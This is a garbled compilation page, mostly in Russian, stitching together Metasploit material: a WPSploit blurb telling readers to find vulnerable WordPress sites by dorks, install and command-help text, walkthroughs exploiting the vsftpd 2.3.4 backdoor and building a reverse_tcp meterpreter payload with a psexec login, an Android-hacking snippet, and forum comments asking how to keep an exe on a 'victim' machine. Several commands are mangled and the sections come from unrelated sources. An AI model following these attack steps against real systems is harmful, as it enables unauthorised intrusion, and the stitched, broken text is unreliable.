Описание WPSploit
WPSploit — это дополнительные модули для эксплуатации уязвимостей WordPress с помощью Metasploit.
Назначение этого репозитория — создание и/или портирование эксплойтов под WordPress, в качестве инструмента эксплуатации используется привычный многим Metasploit.
На данный момент имеется 39 модулей (14 эксплойтов и 25 вспомогательных, которые, как правило, проводят разнообразные сканирования/анализ имеющихся уязвимостей).
Все модули созданы с использованием информации базы данных уязвимостей WPScan. Нужно понимать, что главное отличие этих модулей от названной базы данных в том, что это не просто описания уязвимостей, а готовый эксплойты. Вам только нужно найти уязвимые сайты (по доркам или по собственным базам).
Домашняя страница: https://github.com/espreto/wpsploit
Metasploit Project
Computer Security Project
DownloadRatingsFeaturesDocumentation
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rap…New content will be added above the current area of focus upon selectionThe Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.
- Wikipedia
- Official site
Wrapping It Up
Docker containers offer a convenient way of running Metasploit Framework without having to deal with the installation of the tool’s code and its dependencies. Running Metasploit this way is especially handy for situations where you wish to quickly deploy it to a new system, such as one running in a public cloud, and then tear it down without losing your customizations or data. On the other hand, this approach requires some familiarity with Docker containers.
Thanks to Jean Christophe Baptiste for creating and maintaining the Dockerfile and associated configuration files upon which the «remnux/metasploit» image is based. If you notice any problems with this container or have suggestions for improving it, please log an issue on the REMnux repository for Docker files.
Updated May 12, 2016
Версия Kali Linux 2019 уже выпущена
Недавно вышла новая версия дистрибутива Kali Linux 2019.1. Новая версия tОн имеет обновленные версии включенных компонентов, включая использование ядра Linux 4.19. поскольку последняя версия включала ядро 4.18.
В составе дистрибутива некоторые приложения получили обновления и улучшения, из которых Мы можем выделить платформу анализа уязвимостей Metasploit 5.0, а также пакеты Harvester 3.0.0 и DBeaver 5.2.3, а также новый демон JSON-RPC.
Что касается поддержки добавлены разработчиками Kali Linux эти Устройства Banana Pi и Banana Pro были добавлены в сборку для систем ARM.
В унифицированных наборах для Raspberry Pi (в конфигурацию был добавлен скрипт kalipi-tft-config для настройки TFT LCD, что позволило избавиться от раздельной доставки изображений для плат с подключенными дисплеями).
Как получить Kali Linux 2019.1?
Здесь вы найдете ссылку для загрузки полного ISO-образа (3,2 ГБ) и уменьшенного образа (929 МБ).
Доступны наборы для архитектур x86, x86_64, ARM (armhf и armel, Raspberry Pi, Banana Pi, ARM Chromebook, Odroid). В дополнение к базовой сборке с GNOME и усеченной версии доступны версии с Xfce, KDE, MATE, LXDE и Enlightenment e17.
Si Вы уже являетесь пользователем Kali Linux, вам просто нужно зайти в свой терминал и выполнить следующую команду который будет отвечать за обновление вашей системы, поэтому для выполнения этого процесса необходимо подключение к сети.
Совет: как войти в Kali Linux после его установки?
Наконец, небольшой ресурс, который я оставляю новым пользователям Kali Linux и которые часто консультируются, — это как войти в Kali Linux.Пользователь: rootПередайте: «пароль, который вы указали в процессе установки»
Как записать Kali Linux ISO на USB?
В крайнем случае, я могу предложить вам метод создания USB-накопителя с Kali Linux. Этот метод во многом зависит от используемой вами операционной системы. Если вы пользователь Windows, вы можете использовать инструмент Win32 Disk.
С другой стороны, если вы пользователь Linux, вы можете использовать команду dd для монтирования ISO на свой USB, вам нужно только определить, в какой точке монтирования у вас есть USB, вы можете использовать:
И здесь вам будет показана точка монтирования, вам просто нужно использовать команду dd, например:
Где «if» — это путь, по которому находится ISO, проще всего расположить себя из терминала в папке, где вы сохранили ISO, а где «of» — это точка монтирования вашего USB.
Option 2 — Within the Container
This option is a Docker anti-pattern and I would recommend against it, but it’s still workable and I’ll leave it up to you to judge. This option is worse from performance perspective due to the copy-on-write magic Docker has to do for any file system changes within the container as compared to the image.
Once the container stops (i.e. when you exit the shell), it is not deleted by default. You can view all the containers, including stopped ones, using:
docker ps -a
Note the CONTAINER ID in the output. You can later restart the container using:
docker start --attach <CONTAINER ID>
The data is retained in the container.
Docker Cleanup
When working with Docker, you might end up with a bunch of stopped containers. Use the following command to delete all stopped containers:
docker container prune
You can also use to delete individual containers.
Справка по Metasploit
Использование:
msfconsole
Общие параметры -E, --environment ОКРУЖЕНИЕ Окружение Rails. Будет использовать переменные окружения RAIL_ENV если они установлены. По умолчанию для работы ни опция, ни переменная окружения RAILS_ENV не устанавливаются. Опции базы данных -M, --migration-path ДИРЕКТОРИЯ Указать директорию, содержащую дополнительную базу данных -n, --no-database Отключить поддержку базы данных -y, --yaml ПУТЬ Указать файл YAML, содержащий настройки базы данных Опции фреймворка -c ФАЙЛ Загрузить особый конфигурационный файл -v, --version Показать версию Опции модулей --defer-module-loads Отложить загрузку модулей до явного запроса. -m, --module-path ДИРЕКТОРИЯ Дополнительное размещение модулей Console options: -a, --ask Спросить перед выходом из Metasploit или выйти по 'exit -y' -L, --real-readline Использовать системную библиотеку Readline вместо RbReadline -o, --output ФАЙЛ Вывод в указанный файл -p, --plugin ПЛАГИН Загрузить плагин при старте -q, --quiet При старте не печатать баннер -r, --resource ФАЙЛ Выполнить указанный файл ресурса (- для стандартного ввода) -x, --execute-command КОММАНДА Выполнить указанную строку как консольную команду (для нескольких команд используйте ;) -h, --help Показать справку
Getting Started With the Metasploit Framework
In this post, we will run Metasploit on Kali Linux. Kali Linux is the leading penetration testing distribution and ships with more than 600 security tools. You can checkout our step-by-step guide on installing Kali Linux on VirtualBox.
1. Start the PostgreSQL Database Service
To get started Metasploit framework, you need to start the PostgreSQL database. That enables Metasploit to carry out faster searches and store information when scanning or performing an exploit. Launch the Terminal and execute the command below.
sudo service postgresql startsudo msfdb init
2. Launch Metasploit
As discussed above, there are four interfaces available for use with the Metasploit framework. We will use the msfconsole in this post. Now, there are two ways you can use to launch msfconsole on Kali Linux.
- Command-line method
- Graphical Method
With the command-line method, execute the command below on your Terminal.
msfconsole
Alternatively, you can start from the Kali GUI by clicking on the Menu button -> Exploitation tools -> Metasploit framework.
That will open the Terminal, and you will be prompted to enter the user password before launching the msfconsole command-line shell.
Руководство по Metasploit
Страница man отсутствует.
Основные команды ============= Команда Описание ------- ----------- ? Меню помощи advanced Показать продвинутые опции для одного или более модулей back Вернуться назад из текущего контекста banner Показать шикарный баннер metasploit cd Поменять текущую рабочую директорию color Переключатель света connect Связаться с хостом edit Отредактировать текущий модуль с $VISUAL или $EDITOR exit Выйти в консоль get Получить значение переменной с учетом текущего контекста getg Получить значение глобальной переменной grep Grep вывод другой команды help Меню помощи info Отобразить информацию об одном или более модулей irb Отбросить в режим сценариев irb jobs Отображение и управление работами kill Убить работу load Загрузить плагин фреймворка loadpath Поиск и загрузка модулей из расположения makerc Начиная с запуска сохранить введённые команды в файл options Отобразить глобальные опции для одного или более модулей popm Извлекает последний модуль из стека и делает его активным previous Установить предыдущий загруженный модуль в качестве текущего модуля pushm Поместить активный или список модулей в стек модулей quit Выйти из консоли reload_all Перезагрузить все модули из указанного пути модулей rename_job Переименовать работу resource Запустить команды размещённые в файле route Маршрут трафика через сессию save Сохранить активные datastores search Поиск модулей по имени и описанию sessions Сбросить списки сессий и отобразить информацию по сессиям set Установить значение переменной с учетом текущего контекста setg Установить значение глобальной переменной show Показать модули данного типа или все модули sleep Ничего не делать данное количество секунд spool Писать консольный вывод в файл и на экран threads Просматривать и управлять фоновыми потоками unload Выгрузить плагин фреймворка unset Сброс одной или более переменной с учетом текущего контекста unsetg Сброс одной или более глобальной переменной use Выбрать модуль по имени version Показать версии фреймворка и консольной библиотеки Команды по управлению базой данных ========================= Команда Описание ------- ----------- creds Список всех учётных данных в базе данных db_connect Подключиться к существующей базе данных db_disconnect Отключиться от текущего экземпляра базы данных db_export Экспорт файла, содержащего контенты базы данных db_import Импорт файл с результатами сканирования (тип файла будет определён автоматически) db_nmap Выполнить nmap и автоматически записать вывод db_rebuild_cache Пересоздать кэш модулей, содержащийся в базе данных db_status Показать текущий статус базы данных hosts Список всех хостов в базе данных loot Список всей добычи в базе данных notes Список всех заметок в базе данных services Список всех служб в базе данных vulns Список всех уязвимостей в базе данных workspace Переключиться между рабочими пространствами базы данных
Disable Anti-virus Software
Anti-virus software detects the Metasploit Framework as malicious and may cause problems with the installation and runtime of Metasploit Framework. The Metasploit Framework exploits the same vulnerabilities that the anti-virus software detects. Therefore, when you install the Metasploit Framework, the anti-virus software interrupts the installation process and alerts you of the security risks that may infect the system.
If you intend to use the Metasploit Framework, you should disable any anti-virus software before you install Metasploit Framework. If you cannot disable the anti-virus software, you must exclude the Metasploit directory from the scan.
Metasploit Tutorial
After successfully launching , you will see a Terminal prompt with the format . For example, in our case, we are getting a prompt, as shown below. That means we are running Metasploit version 5. If you are using a newer version, say Metasploit version 6, you will see a prompt.
1. help command
The first and the most basic command you should execute is the command. If you are lost and don’t know which command to use, you can always refer to this documentation. It shows you all the commands you can run and a description of what they do.
Advertisement
help
NOTE:
Metasploit exploits an existing vulnerability on a system. Therefore, if there is no vulnerability or it’s already patched, Metasploit won’t penetrate the system.
2. search command
The other very useful command is . It allows you to search for a particular module among the hundreds of modules available in Metasploit. This command can take three parameters:
- type
- platform
- name
For example, I will use the syntax below to search for a common Unix exploit for VSFTPD version 2.3.4.
search type:exploit platform:unix vsftpd
3. use command
The other most helpful command is the command. It allows you to load a module that you want to use to attack or penetrate a system. These modules include exploits, payloads, auxiliaries, encoders, evasions, nops, and posts.
As a demonstration, we will use a module to exploit an existing vulnerability on VSFTPD version 2.3.4. On the msfconsole, run the command below to load our exploit.
use exploit/unix/ftp/vsftpd_234_backdoor
If the module were successfully loaded, the prompt would change, as shown in the image above. It appends the path of the module in a different color (mostly red). If you see a similar message like «No payload configured, defaulting to…,» don’t worry. It means Metasploit could not automatically load the payload, and you will need to do it manually. In simple terms, a Payload is the code/ script executed through the said exploit.
4. show options command
After successfully loading a module, the following command you need to execute is the command.
show options
This command shows you the different options you can change with the module. For example, in the image above, we see this module requires us to set the RHOST and RPORT.
- RHOST: That is the IP address of the remote system that you want to exploit.
- RPORT: That is the target port you wish to use on the target system.
5. set command
The other helpful command is . This one allows you to set the various value displayed using the command. For example, if you wish to assign values to and we would use the syntax below.
set RHOST set RPORT e.gset RHOST 192.168.1.43set RPORT 21
If you rerun the show options command, you will notice there is a difference. The options RHOSTS and RPORT now have values assigned to them.
NOTE:
Some modules will have several options to set (more than six). In case you find some terms hard to understand their meaning, you can always use the help command.
6. show payloads command
The other command you need to run after this step is . This command lists all the payloads compatible with this module.
show payloads
Running this command on our module only gave us one compatible payload. However, some modules will have more than ten compatible modules to choose from.
To load a particular payload, use the set command as shown below.
set payload cmd/unix/interact
8. run command
After successfully loading the payload, you are now ready to run this exploit against an existing vulnerability on the target system. Execute the command below.
run
From the image above, you can see we successfully ran the exploit against a target system and obtained a command shell session. That means we are now inside the system, and we can now run any Linux commands from our msfconsole, and they will execute on our target system.
How to Hack an Android Phone Using Metasploit Msfvenom in …
https://www.ehacking.net/2020/04/how-to-hack-an…
- Launching An Attack
- Post Exploitation
- Extracting Contacts from An Android Device
Before launching attack, we need to check the status of the apache server. Type command: # service apache2 status All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack. In real life scenarios, some social engineering techniques can be used to let the ta…
See more on ehacking.net
Published: Apr 13, 2020
Author: Irfan Sha…
Estimated Reading Time: 5 mins
Получение точки опоры
Полезная нагрузка
Metasploit предоставляет большой арсенал возможностей для создания полезной нагрузки. Но нужно учитывать, что существуют разные способы внедрения этой самой нагрузки. С помощью фреймворка можно создавать как легкие пейлоады для выполнения команд и получения простого шелла, так и сложные, например meterpreter или VNC (с использованием дополнительного загрузчика).
При этом одна и та же полезная нагрузка может работать как в режиме ожидания подключения (bind), так и в режиме reverse (для бэкконнекта от целевого хоста). Стоит учитывать, что чем легче нагрузка, тем больше ее надежность и стабильность. Так, обычный шелл может быть создан с помощью AWK, jjs, Lua, Netcat, Node.js, Perl, R, Ruby, socat, stub, zsh, ksh, Python, PHP, PowerShell.
Чтобы найти нагрузку для определенного случая, используем команду search.
1 | search payload/ |
Некоторые виды полезной нагрузки Metasploit
В большинстве случаев используется загрузчик в одном из следующих форматов: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war. Для работы с пейлоадами в составе фреймворка имеется свой модуль — msfvenom.
Давайте для примера создадим нагрузку meterpreter типа reverse, работающую по протоколу TCP для операционной системы Windows, — это windows/x64/meterpreter/reverse_tcp.
Описание нагрузки windows/x64/meterpreter/reverse_tcp
Главными параметрами для этой полезной нагрузки будут LHOST и LPORT — адрес и порт нашего сервера для бэкконнекта. Создадим нагрузку в формате *.exe.
1 | msfvenom-pпейлоадпараметрыпейлоада-fформат-oитоговыйфайл |
Создание нагрузки с помощью msfvenom
Исполняемый файл с нагрузкой готов. Да, у msfvenom есть еще много функций вроде задержек и кодеров, но наша команда их не использует.
Листенер
За создание листенера отвечает модуль exploit/multi/handler. Этому модулю нужно указать только целевой пейлоад, с которым он будет взаимодействовать, и параметры этого пейлоада.
1 |
>useexploit/multi/handler >set payload windows/x64/meterpreter/reverse_tcp >set LHOST192.168.6.1 >set LPORT4321 >run |
Создание листенера
Есть быстрый способ создать такой листенер — команда укладывается в одну строку.
1 | handler-pпейлоад-Hхост-Pпорт |
Создание листенера
И теперь наша задача сделать так, чтобы файл с нагрузкой был выполнен на целевом хосте.
Эксплоиты
Об используемых нами эксплоитах в обертке Metasploit Framework я расскажу кратко, так как для получения точки опоры мы используем только два из них. Это exploit/windows/smb/psexec и exploit/windows/smb/ms17_010_eternalblue. Конечно, если нам удается обнаружить уязвимые службы и для них есть эксплоиты в Metasploit, они тоже идут в дело, но такое случается редко.
В следующих разделах мы чуть подробнее разберем именно нагрузку meterpreter, так как легкие нагрузки обеспечивают доступ к обычному шеллу, а vncinject просто открывает удаленный рабочий стол. Для модуля psexec укажем полученные учетные данные, адрес целевого хоста и тип нагрузки с необходимыми параметрами.
1 |
>useexploit/windows/smb/psexec >set payload windows/x64/meterpreter/reverse_tcp >set LHOST192.168.6.1 >set LPORT9876 >set RHOSTS192.168.6.129 >set SMBUser root >set SMBPass1q2w#E$R >set SMBDomain domain.dom >run |
Получение сессии meterpreter
В итоге мы получаем сессию meterpreter для удаленного хоста с операционной системой Windows.
How to install Metasploit on Kali Linux
Since Metasploit is one of the most commonly used penetration testing tools, it comes built-in Kali Linux. If you are using Kali Linux 2.0, the Metasploit framework is already preinstalled and updated monthly.
Disable antivirus software since it detects the Metasploit framework as malicious and may cause problems with the installation and runtime of the Metasploit framework. The Metasploit framework exploits the same vulnerabilities that the antivirus detects. Hence, when installing the Metasploit framework, the antivirus software interrupts the installation process and alerts you of the security risks that may affect the system.
If you can’t disable the antivirus software, you must exclude the Metasploit directory from the scan.
Note: Remember to disable the local firewalls before installing or running the Metasploit framework. The firewall may detect the Metasploit framework as malware and interrupt the download. If you have to operate from behind a firewall, you should download the Metasploit framework from outside the network.
Metasploit installation on Kali Linux using Rapid7
Rapid7 provides an open-source installer for the Metasploit framework on the Linux Operating system. These installers include dependencies (ruby and PostgreSQL) that integrate with your package manager, making them easy to update.
The easiest way to get the Metasploit framework is by downloading the installer from the Rapid7 site. First, visit the website to find and download the installer for your operating system.
The installer provides a self-contained environment for you to run and update the Metasploit framework. All the necessary dependencies are installed and configured for you during the installation process.
When you launch the installer file, the installer will prompt you to enter the destination folder on the hard drive or external disk to install the Metasploit framework.
Install Metasploit on Kali Linux using Terminal
To install the Metasploit on Kali Linux, execute the command below:
sudo apt install metasploit-framework
install Metasploit framework
Starting the Kali PostgreSQL service
If PostgreSQL isn’t running, use the following command to run it:
sudo /etc/init.d/postgresql start
start PostgreSQL
sudo /etc/init.d/postgresql status
PostgreSQL status
Rapid7 includes msfconcsole and installs associated tools like Nmap and John the ripper. To install the Metasploit framework, you must have administrator privileges on the system that you want to use to run the framework.
Note: Rapid7 no longer supports the preinstalled Metasploit Community edition that is on Kali Linux 1.0.
The following script invocation will import the Rapid7 signing key and set up the package for supported Linux systems.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 && msfinstall && ./msfinstall
curl command
After installation is complete, open a terminal window and type the following command to start msfconsole
start msfconsole
Note: if you don’t have a database, you will be prompted to set up a new database.Type Y or Yes to run tyyyyhe initial configuration script to create the initial database.
It may already be in your path, and you can run it directly depending on your environment. A series of prompts will help set up a database and add Metasploit to your local path if it does not exist. These packages will integrate into your package manager and update with the msfupdate command or your package manager. The packages will automatically set up the database or use your existing database if this is the first time using it.
To check to see if the database was set up correctly, run the following command on the terminal:
db_status
checking DB status
If the Metasploit framework is successfully connected to the database, the following status will display:
Connected to msf. Connection type: postgresql.
Managing the database
In case you did not opt to create a database when msfconsole loaded for the first time, you can use the msfdb script to configure PostgreSQL to run as your local user and store the database in
Use the following command to enable and start the database:
sudo msfdb init
initiate mfsdb
You can use any of the following commands to manage the database:
- msfdb reinit – Deletes and re-initializes the database
- msfdb delete – Deletes the database
- msfdb start – Starts the database
- msfdb stop – Stops the database
- msfdb status – Shows the database status
- msfdb run – Starts the database and runs msfconsole
How to install Metasploit in Kali Linux
I don’t like to write this section on how to install Metasploit in Kali Linux. It comes by default in previous versions.
Today I am going to describe here about installation on Metasploit. You can install it directly from the repository by using apt or apt-get command.
First update the repository list by using following command.
#apt-get update
Install the Metasploit framework on Kali Linux by running the following command:
#apt-get install metasploit-framework
You will get some configuration popups at the time of installation. Read configuration messages carefully and configure accordingly.
Upgrade glibc so Click on yes. You can change options by pressing “TAB” key, and for selecting press “ENTER” Key.
I have installed Metasploit successfully. I used command msfconsole to run the Metasploit framework but no success.
I go the following error “You may need to uninstall or upgrade bundler”
You can see in the following image:
Статья Как запустить Metasploit Framework в Kali Linux
Pirnazar
Для запуска Metasploit Framework в Kali 2.0 смотрите здесь.
Чтобы соответствовать Политике Сетевых Служб (Network Services Policy) Kali Linux, при загрузке отсутствуют сетевые службы, включая службы базы данных, поэтому нужно сделать пару шагов чтобы запустить Metasploit с поддержкой базы данных.
Запускаем службу Kali PostgreSQL Metasploit использует PostgreSQL как его базу данных, следовательно сначала её нужно запустить.
ООО Кодебай
BEEF 25.06.2015 в 03:01 Спасибо так и сделаю,так как в бектреке службы были всегда запущены,почему в кали они сделали по другому,не знаешь?еще можешь допилить скин как можно через гуй это все запустить гораздо быстрее по моему
WEBWARE TEAM 25.06.2015 в 06:30 Это слишком простая задача, чтобы писать для неё отдельный ГУЙ. Можно просто собрать всё это в одну команду:
service postgresql start && service metasploit start && update-rc.d postgresql enable && update-rc.d metasploit enable (эту команду нужно вводить один раз, т.к. теперь после каждой перезагрузки службы будут запускаться отдельно)
service postgresql start && service metasploit start && msfconsole
(эта команда запустить необходимые службы на один раз, а также сам Metasploit).
Можно эти строчки сохранить в файл и запускать этот файл двойным кликом:
echo -e ‘#! /bin/bashnservice postgresql start && service metasploit startnmsfconsole’ > Desktop/StartMetasploit.sh && chmod +x Desktop/StartMetasploit.sh (после выполнения этой команды на рабочем столе создастся файл, при двойном клике на который будет запускаться Metasploit).
но ГУЙ здесь точно не нужен.
LEO 11.07.2015 в 19:38 а подскажите есть какие нибудь эксплоиты под семерку чтоб удоленно можно было взлом произвести как примеру под xp такие есть,что то наподобии такого ms03_026_dcom .
MARK 26.10.2015 в 18:56 root@10101:
# service postgresql start root@10101:
# service metasploit start Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.
ТАРИК 23.04.2016 в 23:12 та же проблемка
SHA9 01.05.2016 в 17:08 решение #/etc/init.d/postgresql service –status-all service postgresql start service postgresql status
#/usr/bin/msfconsole msfdb init msfconsole msf > db_status
KURT135 23.01.2016 в 02:50 Народ вот подскажите мне как новичку… Взломал я комп ,вроде все хорошо , но возник другой вопрос . Как сделать так, чтобы фал (exe) созданный в metasploit установился в систему жертвы ,чтобы можно было в любо момент подключиться к данной машине (жертвы) ?
NKSHUM 21.03.2016 в 15:58 При вводе команды show options нет ни одного эксплойта. Командой mfsupdate обновить базу метасплойта не получается выдает следующее : Attempting for update Metasploit Framework . Cheking for update via the APT repository Note: expect weekly (ish) updates using this method No update available
Подскажите что делать?
SHA9 01.05.2016 в 16:45 Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.
проблема та-же,а решения пока никто не написал